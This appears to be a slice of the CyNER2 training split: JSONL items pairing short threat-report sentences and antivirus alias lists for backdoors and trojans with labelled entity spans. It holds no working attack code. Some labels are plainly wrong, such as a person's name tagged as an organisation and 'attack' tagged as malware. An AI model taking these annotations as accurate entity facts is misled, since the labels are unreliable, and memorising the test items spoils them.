{"text": "Quasar is a .NET Framework-based open-source RAT.", "spans": {"MALWARE: Quasar": [[0, 6]], "SYSTEM: .NET": [[12, 16]], "MALWARE: RAT.": [[45, 49]]}, "info": {"id": "cyner2_train_007640", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Z.Delf.2373896 Troj.Spy.W32.Zbot.lw7D Win32.Trojan-downloader.Rakhni.Html Trojan-Downloader.Win32.Delf W32/Application.AJYX-3726 TrojanDownloader.Rakhni.ec TR/Dldr.Delf.tbxxd W32/Dloader.CDW!tr Trojan[Downloader]/Win32.Rakhni Trojan.Application.Bundler.InstallMonster.392 Trojan-Downloader.Win32.Rakhni.jqc Trj/CI.A Win32/Trojan.036", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007641", "source": "cyner2_train"}}
{"text": "While it is not clear whether the primary goal of the attack was delivering the malicious payload or capturing the targets OWA credentials, this attack uses an OWA phish to additionally pushes a malicious document with a Veil-Framework payload capable of downloading further malware.", "spans": {"MALWARE: malicious payload": [[80, 97]], "ORGANIZATION: OWA": [[123, 126]], "MALWARE: attack": [[145, 151]], "VULNERABILITY: OWA": [[160, 163]], "MALWARE: Veil-Framework payload": [[221, 243]], "MALWARE: malware.": [[275, 283]]}, "info": {"id": "cyner2_train_007643", "source": "cyner2_train"}}
{"text": "Installed with backdoored software, for example:- Telegram.exe - mech_korolya_artura_2017.HDRip.exe", "spans": {"MALWARE: backdoored software, for": [[15, 39]]}, "info": {"id": "cyner2_train_007645", "source": "cyner2_train"}}
{"text": "Founded in 2013, the Android Marcher mobile malware has widely been targeting Google Play -- harvesting user credentials and credit card data.", "spans": {"MALWARE: Android Marcher mobile malware": [[21, 51]], "SYSTEM: Google Play": [[78, 89]]}, "info": {"id": "cyner2_train_007646", "source": "cyner2_train"}}
{"text": "Ransomware persists as one of the top crimeware threats thus far into 2016.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: crimeware threats": [[38, 55]]}, "info": {"id": "cyner2_train_007647", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.AxVDb.Trojan Trojan.Rincux.AW Trojan.Injector.26488 Trojan.Rincux.AW Trojan.Injector Tool.StormAttack.Win32.10 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.Rincux-6417593-0 Trojan-DDoS.Win32.StormAttack.c Trojan.Rincux.AW Trojan.Win32.Tdss.bziyas Trojan.Rincux.AW TrojWare.Win32.Magania.~AAC DDoS.Storm.156 BehavesLike.Win32.Backdoor.km TrojanDDoS.StormAttack.a Trojan[Rootkit]/Win32.TDSS DDoS:Win32/Stormser.A Trojan.Rincux.AW Trojan-DDoS.Win32.StormAttack.c BScope.Trojan.Win32.Inject.2 Trojan-Downloader.Win32.Pangu W32/ServStart.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007648", "source": "cyner2_train"}}
{"text": "Daserf's main purpose is information stealing and the Trojan is capable of gathering information from infected computers and relaying it back to attacker-controlled servers.", "spans": {"MALWARE: Daserf's": [[0, 8]], "MALWARE: Trojan": [[54, 60]], "SYSTEM: infected computers": [[102, 120]], "SYSTEM: attacker-controlled servers.": [[145, 173]]}, "info": {"id": "cyner2_train_007651", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Flystud!O Trojan.Hookmoot.S217748 Trojan.Symmi.D7D5 Win32.Worm.FlyStudio.mc Trojan.Dropper Win32/SillyAutorun.ALB Win.Trojan.Rootkit-7763 Win32.Trojan.FlyStudio.A Trojan-GameThief.Win32.OnLineGames.boif Trojan.Win32.QQPass.esaped Troj.Dropper.W32.Flystud.lBWL Trojan.MulDrop5.5320 Dropper.Flystud.Win32.139 BehavesLike.Win32.Autorun.vc Trojan/PSW.OnLineGames.cvvq RKIT/Tiny.BK.2 Trojan:Win32/Englov.A Trojan-GameThief.Win32.OnLineGames.boif HEUR/Fakon.mwf Rootkit.Tiny Trojan.AutoRun Win32/FlyStudio.A Trojan.TenThief.QQPsw.tss Worm.Autorun!1DOkY6YfgQ8 Rootkit.Win32.Tiny W32/BDoor.DRV!tr Win32/Trojan.dd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007653", "source": "cyner2_train"}}
{"text": "But we recently identified an app that demonstrated new ways of successfully evading Apple's code review.", "spans": {"ORGANIZATION: Apple's": [[85, 92]]}, "info": {"id": "cyner2_train_007656", "source": "cyner2_train"}}
{"text": "The stolen credentials may be used for remote access into the victim network if applicable.", "spans": {"SYSTEM: the victim network": [[58, 76]]}, "info": {"id": "cyner2_train_007657", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Darkshell BehavesLike.Win32.Ipamor.nm Trojan[Downloader]/Win32.Delf Trojan:WinNT/Darkshell.C Trojan/Win32.CSon.R1800 Trojan.Win32.Scar.mg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007658", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.B01D Troj.Crypt.Tpm!c BehavesLike.Win32.PWSQQPass.vc Trojan:Win32/Valan.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007659", "source": "cyner2_train"}}
{"text": "It can also imitate a legitimate website to lure you into revealing your sensitive information.", "spans": {}, "info": {"id": "cyner2_train_007660", "source": "cyner2_train"}}
{"text": "Dyreza originally focused on intercepting end-user bank logins, and later expanded to job hunting, file hosting, domain registration, website hosting, file hosting, tax services, and online retail categories", "spans": {"MALWARE: Dyreza": [[0, 6]], "ORGANIZATION: job hunting, file hosting, domain registration, website hosting, file hosting, tax services, and online retail categories": [[86, 207]]}, "info": {"id": "cyner2_train_007661", "source": "cyner2_train"}}
{"text": "Brain Test has been removed from Google Play since September 24.", "spans": {"MALWARE: Brain Test": [[0, 10]], "SYSTEM: Google Play": [[33, 44]]}, "info": {"id": "cyner2_train_007662", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.DinwoodAATTC.Worm Trojan.Zenshirsh.SL7 TSPY_EYDROP.SMA Win32/Oflwr.A!crypt TSPY_EYDROP.SMA Win.Worm.Allaple-5 Trojan-Dropper.Win32.Dinwod.acqn Trojan.Win32.Dinwod.ejafor Troj.Dropper.W32.Dinwod.toVw TrojWare.Win32.TrojanDropper.Dinwod.A Trojan.Inject1.58305 BehavesLike.Win32.Dropper.wh TrojanDropper.Dinwod.ale Worm[NET]/Win32.Nimda.gic Trojan-Dropper.Win32.Dinwod.acqn Trojan/Win32.OnlineGameHack.C33730 TrojanDropper.Dinwod Trojan.Dropper Trojan.DR.Dinwod!dCCk6/8cSJk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007663", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Symmi!O WS.Reputation.1 OnLineGames.IRMW Win32/Oflwr.A!crypt Riskware.Win32.FakeLPK.cwuava BackDoor.BlackHole.21297 TR/Obfuscated.XZ.937 HackTool.Sniffer.WpePro PSW.OnlineGames4.BEIZ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Connapts Trojan/Small.ndx Trojan.Heur.LP.EDC094 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.MLW.dylhy W32/Trojan.CISW-8628 Backdoor.Bot/Variant Trojan/Win32.Xema.C93063 W32/Small.NDX!tr Win32/Backdoor.796", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007666", "source": "cyner2_train"}}
{"text": "This spring, the author of the NukeBot banking Trojan published the source code of his creation.", "spans": {"THREAT_ACTOR: the author": [[13, 23]], "MALWARE: NukeBot banking Trojan": [[31, 53]]}, "info": {"id": "cyner2_train_007667", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.ELEXCRTD.Win32.5604 Trojan.Johnnie.D709 not-a-virus:AdWare.Win32.Elex.sgn Adware.Mutabaha.1819 RiskTool.Uncheckit.l TR/Chuckenit.dglxl Trojan:Win32/Chuckenit.A not-a-virus:AdWare.Win32.Elex.sgn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007668", "source": "cyner2_train"}}
{"text": "This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.", "spans": {"MALWARE: Carbon": [[92, 98]]}, "info": {"id": "cyner2_train_007669", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Slingup BKDR_SLINGUP.M W32/Zbot.AAJD Backdoor.Trojan BKDR_SLINGUP.M Trojan.Win32.Yakes.pqep Trojan.Win32.Inject.ecmohu Trojan.Win32.Z.Yakes.672768 Troj.W32.Yakes.tn6w BackDoor.Tordev.8 Trojan.Win32.Injector W32/Zbot.EUMY-8878 TR/Injector.juol Trojan/Win32.Yakes Trojan:Win32/Casidel.A Trojan.Win32.Yakes.pqep Trojan.Yakes Trojan.Yakes Trj/CI.A Win32/Injector.CXUT Win32.Trojan.Yakes.Ehid Trojan.Yakes!YuLYvE8ikp0 W32/Injector.CGQK!tr Win32/Trojan.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007670", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 W32/Virut.AI W32.Virut.CF Win32/Virut.17408 PE_VIRUX.A-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.tt Virus.Win32.Virut.CE Trojan.MulDrop1.57199 PE_VIRUX.A-1 BehavesLike.Win32.Virut.dc W32/Virut.AI Win32/Virut.bn Trojan[Dropper]/Win32.Injector Win32.Virut.nc.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Win32/Virut.NBP IM-Worm.Win32.Zeroll W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007672", "source": "cyner2_train"}}
{"text": "Spreads via password guessing over networks", "spans": {}, "info": {"id": "cyner2_train_007673", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kitoles Trojan.Ransom.Scarab Win32.Trojan.WisdomEyes.16070401.9500.9547 W32/Trojan.LUOM-4097 Ransom.CryptXXX Win.Ransomware.Scarab-6336012-1 Win32.Trojan-Ransom.Amnesia.J52DUW Trojan.Win32.Encoder.ewdzie Trojan.Win32.Z.Securityshield.193058 Trojan.Encoder.23898 Trojan-Ransom.FileCoder Trojan.Purga.w Trojan.Ransom.Scarab.3 Ransom:Win32/Kitoles.A Trojan/Win32.Scarab.R213792 Trojan-Ransom.Purga Win32.Trojan.Filecoder.Phqc Win32/Trojan.Ransom.089", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007675", "source": "cyner2_train"}}
{"text": "This specific downloader, Cmstar, is associated with the Lurid downloader also known as Enfal'.", "spans": {"MALWARE: downloader, Cmstar,": [[14, 33]], "MALWARE: Lurid downloader": [[57, 73]], "MALWARE: Enfal'.": [[88, 95]]}, "info": {"id": "cyner2_train_007676", "source": "cyner2_train"}}
{"text": "Recently Malwarebytes got access to several elements of the espionage toolkit that has been captured attacking Vietnamese institutions.", "spans": {"ORGANIZATION: Malwarebytes": [[9, 21]], "MALWARE: espionage toolkit": [[60, 77]], "ORGANIZATION: Vietnamese institutions.": [[111, 135]]}, "info": {"id": "cyner2_train_007678", "source": "cyner2_train"}}
{"text": "I am not entirely sure what it is but it has some indications of fareit Trojan.", "spans": {"MALWARE: fareit Trojan.": [[65, 79]]}, "info": {"id": "cyner2_train_007679", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dos.Bonk.C DoS.Win32.Bonk!O Dos.Bonk Win32.Trojan.Bonk.Tcwa W32/Tool.FPXO-2436 DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Win32.Bonk.ddda TrojWare.Win32.DoS.Bonk.C Trojan.Dos.Bonk.C Trojan.Inject.654 BehavesLike.Win32.ExploitMydoom.mm Backdoor.Win32.HacDef W32/VirTool.RO TR/RedCap.kudtu DoS:Win32/Bonk.C Trojan.Dos.Bonk.C DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Asthma.23305 Trojan.Dos.Bonk.C Trojan.Dos.Bonk.C Win32/DoS.Bonk.C DoS.Bonk!CFlP7tiJI8A DoS/Bonk.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007680", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Duqu Trojan.Duqu.Win32.13 TROJ_DUQU.DEC Win32.Trojan.WisdomEyes.16070401.9500.9587 Win32/Duqu.A TROJ_DUQU.DEC Win.Trojan.Duqu-14 Trojan.Win32.Duqu.evvbpp Trojan.Duqu.2 W32/Trojan.CVVB-9378 TR/Offend.6750706 W32/Duqu.A!tr Trojan:Win32/Duqu.C Worm/Win32.Stuxnet.R608 Trojan.Duqu!ZB0mf9vKpU8 Trojan.Win32.Urelas Win32/Trojan.d72", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007681", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.10E5 Trojan-Dropper.Win32.Decay!O Troj.Dropper.W32.Decay.fvr!c Trojan/Dropper.Decay.dst Trojan.Razy.DD584 W32/Dropper.ANEZ TROJ_DECAY.SM Trojan-Dropper.Win32.Decay.fvr Trojan.Win32.Decay.biarma TrojWare.Win32.TrojanDropper.Decay.ghu Trojan.MulDrop6.60922 TROJ_DECAY.SM BehavesLike.Win32.Virut.lc W32/Risk.RTXX-1196 TrojanDropper.Decay.bo TR/Drop.Decay.ayb Trojan[Dropper]/Win32.Decay TrojanDropper:Win32/Decay.A Dropper.Decay.47104.B Trojan-Dropper.Win32.Decay.fvr Win32.Trojan.Yoybot.A Dropper/Win32.Decay.R2060 TrojanDropper.Decay Backdoor.Win32.Poison W32/Decay.FVR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007683", "source": "cyner2_train"}}
{"text": "Uptycs research team has discovered a malware family that controls its operations over the messaging service Telegram.", "spans": {"ORGANIZATION: Uptycs research team": [[0, 20]], "MALWARE: malware family": [[38, 52]], "SYSTEM: Telegram.": [[109, 118]]}, "info": {"id": "cyner2_train_007686", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Blulock.R002C0CKC17 Trojan.Ransomlock.AI Ransom_Blulock.R002C0CKC17 Win32.Worm.FlyStudio.C not-a-virus:RiskTool.Win32.FlyStudio.awnz Trojan.Win32.Z.Strictor.901632.H TrojWare.Win32.FlyStudio.~UJ Trojan.Winlock.11779 TR/Strictor.901632.1 Trojan.Strictor.DC183 not-a-virus:RiskTool.Win32.FlyStudio.awnz Ransom:Win32/Blulock.A Trojan/Win32.Ransomlock.R135596 Trojan.FlyStudio Trj/CI.A Trojan.Win32.Winlock.f Ransom.FUL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007689", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pucedoor.Win32.63 Troj.W32.Pucedoor!c W32/Trojan.MNET-5041 Trojan.Pucedoor Trojan.Win32.Pucedoor.aa Trojan.Win32.AD.eoqlfa Trojan.Win32.Z.Pucedoor.15360 Trojan.Pucedoor.d TR/Pucedoor.hopld Trojan/Win32.Pucedoor Trojan:Win32/Mirsonk.A Trojan.Mikey.D109B5 Trojan.Win32.Pucedoor.aa Trojan/Win32.Pucedoor.R216811 Trj/CI.A Win32.Trojan.Pucedoor.Sxxz Win32/Trojan.Proxy.62e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007691", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/MSILPack.a Trojan.MSIL.VB!/kGPqcrNINQ TROJ_FAM_0000b54.TOMA Packed.MSIL.MSILPack.a Worm.Win32.Rebhip!IK Packed:W32/DonutCrypt.A Trojan.MulDrop1.40622 TROJ_FAM_0000b54.TOMA Packed.MSIL.is TrojanDropper:MSIL/VB.K Packed/Win32.MSILPack Worm.Win32.Rebhip MSIL/AntiAV.NET!tr Trj/Dropper.AJX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007693", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Senna KIT/SennaSpy.30 HackTool[Constructor]/Win32.SennaSpy VTool.SennaSpy.30.kcloud Constructor:Win32/Sennaspy.3_0 Constructor.Win32.SennaSpy Win32/Constructor.Spy.58d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007694", "source": "cyner2_train"}}
{"text": "We also discovered, based on the samples we gathered, that the malware, which we call CloudTap, has been in use for over a year.", "spans": {"MALWARE: samples": [[33, 40]], "MALWARE: malware,": [[63, 71]], "MALWARE: CloudTap,": [[86, 95]]}, "info": {"id": "cyner2_train_007695", "source": "cyner2_train"}}
{"text": "Last week Forcepoint tracked an interesting e-mail campaign that was distributing double zipped files with Windows Script Files WSFs inside.", "spans": {"ORGANIZATION: Forcepoint": [[10, 20]], "THREAT_ACTOR: e-mail campaign": [[44, 59]]}, "info": {"id": "cyner2_train_007696", "source": "cyner2_train"}}
{"text": "Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "ORGANIZATION: customers": [[40, 49]], "MALWARE: exploit kit": [[92, 103]], "ORGANIZATION: the Polish banks.": [[118, 135]]}, "info": {"id": "cyner2_train_007697", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/Small.acc Backdoor.Trojan Backdoor.Win32.Small.acc Trojan.Win32.Small.gcwll Backdoor.W32.Small.acc!c Win32.Backdoor.Small.Egnw Backdoor.Small.Win32.7271 Backdoor/Small.dwv BDS/Dalbot.147456 Trojan[Backdoor]/Win32.Small Backdoor.Win32.A.Small.147456 Backdoor.Win32.Small.acc Trojan/Win32.Dalbot.C330242 Backdoor.Small W32/Small.ACC!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007698", "source": "cyner2_train"}}
{"text": "They are known to run watering hole and spearphishing campaigns to better pinpoint their targets.", "spans": {"THREAT_ACTOR: spearphishing campaigns": [[40, 63]]}, "info": {"id": "cyner2_train_007699", "source": "cyner2_train"}}
{"text": "An investigation by Wiz Threat Research has revealed that tens of thousands of websites in East Asia have been hijacked, redirecting users to adult-themed content over the last few months.", "spans": {"ORGANIZATION: Wiz Threat Research": [[20, 39]]}, "info": {"id": "cyner2_train_007701", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Symmi.D5257 Troj.Downloader.W32!c Trojan.Click2.53876 BehavesLike.Win32.Comame.pc TrojanProxy:Win32/Potukorp.A Trj/CI.A W32/Farfli.WF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007702", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.S467543 Trojan.Injector.Win32.474808 Trojan/Injector.dkps Trojan.Zbot.191 Win32.Trojan.WisdomEyes.16070401.9500.9969 Ransom_NATAS.SM1 Win.Ransomware.Satan-5713061-0 Trojan.Win32.DKPS.elolak Trojan.Win32.Z.Satan.189345 TrojWare.Win32.Lepoh.A Trojan.Packed2.39908 Ransom_NATAS.SM1 BehavesLike.Win32.Trojan.cc Ransom:Win32/Nasan.B!bit Ransom.Satan/Variant Trojan.Packed Ransom.Satan Win32/Filecoder.Natas.A Win32.Trojan.Filecoder.Hqlr Trojan-Ransom.Satan Win32/Trojan.BO.91d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007703", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Selfdel.B7 PUP.Optional.InstallMonster Win32.Trojan.Kryptik.zv Trojan.Win32.InstallCube.echedc Application.Win32.ICLoader.VAL Trojan.InstallCube.1058 Trojan.Win32.Crypt Trojan.ExtenBro.od Pua.Downloadmanager GrayWare[AdWare]/Win32.SmartInstaller Trojan.Barys.DD4DA Trojan:Win32/Selfdel.B PUP/Win32.ICLoader.R181040 TScope.Malware-Cryptor.SB Trj/CI.A Trojan.ExtenBro! Win32/Trojan.d13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007704", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.SintaCry BehavesLike.Win32.Trojan.tc Ransom:Win32/SintaCry.A Win32.Trojan-Ransom.CryPy.C Trojan/Win32.CryptXXX.C1966139 Python/Filecoder.AB Trojan.Win32.CryPy.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007705", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.7656 Spyware.OnlineGames Trojan.Barys.156 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Application.PUPStudio.A BehavesLike.Win32.Backdoor.tc TrojanDownloader:Win32/Neglemir.A PUA.RiskWare.DYAMAR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007706", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M/Downloader.clk W97M.Downloader W2KM_POWLOAD.UHAOEBF Macro.Trojan.Dropperd.Auto W2KM_POWLOAD.UHAOEBF W97M/Downloader.ciz Malicious_Behavior.SB virus.office.qexvmc.1070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007707", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Rovnix.AB4 Trojan.Rovnix Trojan/Rovnix.af Trojan.Cidox.E TROJ_ROVNIX.SMA0 Win.Trojan.Rovnix-7 Trojan.Win32.Rovnix.dxtqfl Trojan.Win32.Z.Rovnix.78336.D[h] Trojan.Rovnix.Win32.624 TROJ_ROVNIX.SMA0 Trojan.Rovnix.cl W32/Rovnix.AG!tr Trojan/Win32.Rovnix Trojan.Razy.D3C8A Troj.W32.Rovnix!c Trojan/Win32.Rovnix TrojanDownloader:Win32/Rovnix.A Trojan.Win32.Rovnix.jg Trojan.Rovnix!Bc+f/jzbrBg Trojan.Win32.Rovnix Atros2.AGYW Trj/Rovnix.B Win32/Trojan.bb6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007708", "source": "cyner2_train"}}
{"text": "While we do not know for sure the source of these details, they frequently appear on public websites, such as LinkedIn or the company's own website.", "spans": {"ORGANIZATION: LinkedIn": [[110, 118]]}, "info": {"id": "cyner2_train_007709", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Delf Downloader.Delf.Win32.55939 Win.Trojan.Delf-6394424-2 Trojan-Downloader.Win32.Delf.kqql Trojan.Win32.Delf.evdbxm Trojan.Win32.Z.Delf.912896 Troj.Downloader.W32.Delf!c Trojan.DownLoad3.47593 Trojan-Downloader.Win32.Delf W32/Trojan.NTEF-5615 TR/Downloader.lpmfp Trojan-Downloader.Win32.Delf.kqql Downloader/Win32.Delf.C2285081 Trj/GdSda.A Win32.Trojan-downloader.Delf.Ammc W32/Delf.CGH!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007710", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.SWF.CVE-2017-11292.1 Trojan.Maljava SWF/Exploit.CVE-2017-11292.A DOC.Z.CVE-2017-1129.10752 Exploit.CVE-2017-11292.1 SWF_EXPLOIT.YYRZ Trojan.DWCI-31 EXP/CVE-2017-11292.B Trojan[Exploit]/SWF.CVE-2017-11292.a Trojan:O97M/Gamafeshi.A Trojan.SWF.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007715", "source": "cyner2_train"}}
{"text": "The hacker proceeded to leak archives of internal Hacking Team tools and communications.", "spans": {"THREAT_ACTOR: The hacker": [[0, 10]], "ORGANIZATION: Hacking Team": [[50, 62]]}, "info": {"id": "cyner2_train_007717", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Small.8192.U Backdoor.Win32.Small!O Backdoor.Small Backdoor/Small.aad BKDR_SMALL.LIY Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareS.BJDC BKDR_SMALL.LIY Win.Trojan.Small-15022 Backdoor.Win32.Small.aad Trojan.Win32.Small.cgfnz Backdoor.Win32.A.Small.8192.J Backdoor.Win32.Small.~C W32/Risk.EHGV-6738 Backdoor/Small.cqd W32.Malware.Downloader BDS/Small.L Trojan[Backdoor]/Win32.Small Backdoor.W32.Small.aad!c Backdoor.Win32.Small.aad Backdoor:Win32/Neporoot.A Trojan/Win32.Downloader.C113283 Backdoor.Small Trj/CI.A Win32.Backdoor.Small.Eckj Trojan.DL.Troxen!zKvgG9AM1Ro Backdoor.Win32.Small W32/CMDer.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007721", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Skypii Trojan/Injector.aech Trojan.Johnnie.D5D69 W32.Phopifas Win.Trojan.Zbot-63011 Trojan-Dropper.Win32.Injector.tsab Trojan.Win32.Zbot.crqlec Trojan.Win32.Z.Johnnie.44972 Trojan.MulDrop2.64582 Trojan.Win32.Injector W32/Trojan.GAQU-5890 TR/Buzus.A.287 Worm:Win32/Skypii.A Trojan-Dropper.Win32.Injector.tsab Trojan/Win32.Inject.R57535 BScope.Adware.Softpulse Win32.Trojan-dropper.Injector.Hyah W32/Inject.AEC!tr Win32/Trojan.Downloader.31f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007722", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Brancud Dropper.Wlord.Win32.197 Trojan/Dropper.Wlord.vg Trojan.Barys.D14BD W32/Backdoor2.FFAV Win.Trojan.Delf-10381 Trojan.Win32.Pigeon.edgwvf NetWorm.Win32.Kolab.~F BackDoor.Pigeon.14364 BehavesLike.Win32.HLLP.vc Trojan.Win32.ProcessHijack W32/Backdoor.UDBV-8754 Win32.Troj.Wlord.vg.kcloud Spyware.Wlord.Dr.2888704 TrojanDropper.Wlord Win32/TrojanDropper.Delf.NQG Win32.Trojan-dropper.Wlord.Wncj Trojan.DR.Wlord!ooBDWiiijA4 Win32/Trojan.f50", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007725", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9947 Trojan.Razy.D1B384 Backdoor:MSIL/Gataspi.A Backdoor.NanoCore Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007727", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Proxyier!O DNSChanger.cw Trojan.Zusy.Elzob.D136F TROJ_DNSCHANGER_0000063.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9713 TROJ_DNSCHANGER_0000063.TOMA Win.Trojan.B-445 Backdoor.Win32.Simda.ph Trojan.Win32.Simda.bxootp Backdoor.Proxyier.Win32.9 BehavesLike.Win32.Backdoor.fc Backdoor/Proxyier.o Trojan/Win32.Proxyier Trojan:Win64/Simda.A Backdoor.Win32.Simda.ph Trojan/Win32.Jorik.R13830 SScope.Trojan-Proxy.1821 Trojan.FakeAlert Trojan.Win32.FakeAV W32/Binder.RZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007728", "source": "cyner2_train"}}
{"text": "The malware infected a wide spread of Android users in China, stealing their bank credentials and other sensitive personal information.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Android users": [[38, 51]]}, "info": {"id": "cyner2_train_007729", "source": "cyner2_train"}}
{"text": "UrlZone is a banking trojan that appeared in 2009.", "spans": {"MALWARE: UrlZone": [[0, 7]], "MALWARE: banking trojan": [[13, 27]]}, "info": {"id": "cyner2_train_007731", "source": "cyner2_train"}}
{"text": "There has been considerable discussion about domain fronting following the release of a paper detailing these techniques.", "spans": {}, "info": {"id": "cyner2_train_007733", "source": "cyner2_train"}}
{"text": "This attack was dubbed Dark Seoul'; it involved wreaking havoc on affected systems by wiping their hard drives, in addition to seeking military intelligence.", "spans": {"THREAT_ACTOR: Dark Seoul';": [[23, 35]], "SYSTEM: affected systems": [[66, 82]]}, "info": {"id": "cyner2_train_007734", "source": "cyner2_train"}}
{"text": "Last week, Patrick Wardle published a very nice analysis of a new Backdoor and Dropper used by HackingTeam, which is apparently alive and well.", "spans": {"ORGANIZATION: Wardle published": [[19, 35]], "MALWARE: Backdoor": [[66, 74]], "MALWARE: Dropper": [[79, 86]], "ORGANIZATION: HackingTeam,": [[95, 107]]}, "info": {"id": "cyner2_train_007735", "source": "cyner2_train"}}
{"text": "Indicators imply an exploitation attempt, that may not have been successful.", "spans": {"VULNERABILITY: exploitation": [[20, 32]]}, "info": {"id": "cyner2_train_007737", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Pdf.Fareit.A PDF/PowerShell.C Exploit.PDF.16243 HEUR_PDF.PS TrojanDownloader:Win32/Perferd.A PDF/Exploit.S3 PDF/PowerShell.ECC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007738", "source": "cyner2_train"}}
